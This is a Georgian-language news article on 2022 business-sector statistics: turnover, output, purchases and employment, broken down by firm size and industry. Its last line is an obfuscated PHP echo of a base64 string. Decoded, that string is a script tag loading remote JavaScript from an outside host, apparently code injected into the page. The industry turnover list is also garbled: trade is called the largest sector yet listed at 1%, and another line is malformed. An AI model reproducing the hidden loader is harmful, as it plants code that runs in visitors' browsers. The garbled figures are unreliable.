celsiusi
ავერსი საქკაბელი

ბიზნეს სექტორის ბრუნვის მოცულობა 2022 წელს, გასული წლის შესაბამის პერიოდთან შედარებით 20.8%-ით გაიზარდა და 181.8 მილიარდი ლარი შეადგინა.

სტატისტიკის ეროვნული სამსახურის მიერ დღეს გამოქვეყნებული საწარმოთა საქმიანობის 2022 წლის შედეგების მიხედვით, გასულ წელს ბიზნეს სექტორის პროდუქციის გამოშვების მაჩვენებელიც ზრდის ტენდენციით ხასიათდებოდა.

ბიზნეს სექტორის პროდუქციის გამოშვების მოცულობა 71.8 მლრდ ლარით განისაზღვრა, რაც გასული წლის მაჩვენებელს 24.6%-ით აღემატება.

2022 წელს მთლიანი ბრუნვის მსხვილ ბიზნესზე 65.5% მოდის, საშუალოზე 16.1%, ხოლო 18.3% - მცირე ბიზნესზე ნაწილდება.

მცირედით განსხვავებული მდგომარეობაა პროდუქციის მთლიანი გამოშვების შემთხვევაში: მსხვილ ბიზნესზე მოდის პროდუქციის გამოშვების 48.6%, საშუალოზე - 23.7%, ხოლო მცირე ბიზნესზე - 27.7%.

საწარმოთა მიერ განხორციელებულმა საქონლისა და მომსახურების მთლიანმა ყიდვებმა 2022 წელს 101.4 მლრდ ლარი, ხოლო გადასაყიდად განკუთვნილი საქონლისა და მომსახურების ყიდვებმა - 65.8 მლრდ ლარი შეადგინა. საქონლისა და მომსახურების მთლიანი ყიდვები 24.6%-ით, ხოლო გადასაყიდად განკუთვნილი საქონლისა და მომსახურების ყიდვები გასული წლის მაჩვენებლებზე 27%-ით მეტია.

გასული წლის განმავლობაში გაიზარდა ბიზნეს სექტორში დასაქმებულთა საშუალო რაოდენობაც. ჯამში 2022 წელს დასაქმებულთა საშუალო რაოდენობა 779.4 ათასი კაცით განისაზღვრა, რაც გასული წლის მაჩვენებელს 4.7%-ით აღემატება. დასაქმებულთა მთლიანი რაოდენობიდან 43.1% ქალია, ხოლო 56.9% - კაცი.

დასაქმებულთა მთლიანი რაოდენობის 39.9% მსხვილ ბიზნესზე მოდის, 20.3% - საშუალოზე, ხოლო დარჩენილი 39.8% - მცირე ბიზნესზე.

2022 წელს ბიზნეს სექტორის ბრუნვის სტრუქტურაში ყველაზე მაღალი წილი ვაჭრობის დარგზე მოდის. ბრუნვის მიხედვით დარგების რეიტინგი კი ასეთია:

  • ვაჭრობა - 1%;
  • ადგილზეა ხელოვნება, გართობა და დასვენება 29.1%;
  • დამმუშავებელი მრეწველობა - 9.4%;
  • მშენებლობა - 6%;
  • ტრანსპორტი და დასაწყობება - 5.1%;
  • ელექტროენერგიის, აირის, ორთქლის და კონდიცირებული ჰაერის მიწოდება - 3.1%;

ხოლო დარჩენილი 9.2% კი სხვა დარგებზე ნაწილდება.

რაც შეეხება გამოშვების მაჩვენებელს და სექტორების მიხედვით გადანაწილებას, 2022 წელს ბიზნეს სექტორის პროდუქციის გამოშვებაში პირველ და მეორე ადგილებს იკავებს

დამამუშავებელი მრეწველობა (22.2%) და ვაჭრობა (19.2%), შემდეგ მოდის მშენებლობა (16.6%) და ტრანსპორტი და დასაწყობება - 9.5%-იანი წილით, ხოლო დანარჩენ დარგებს სტრუქტურაში 32.5%-იანი წილი უჭირავს.

460
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");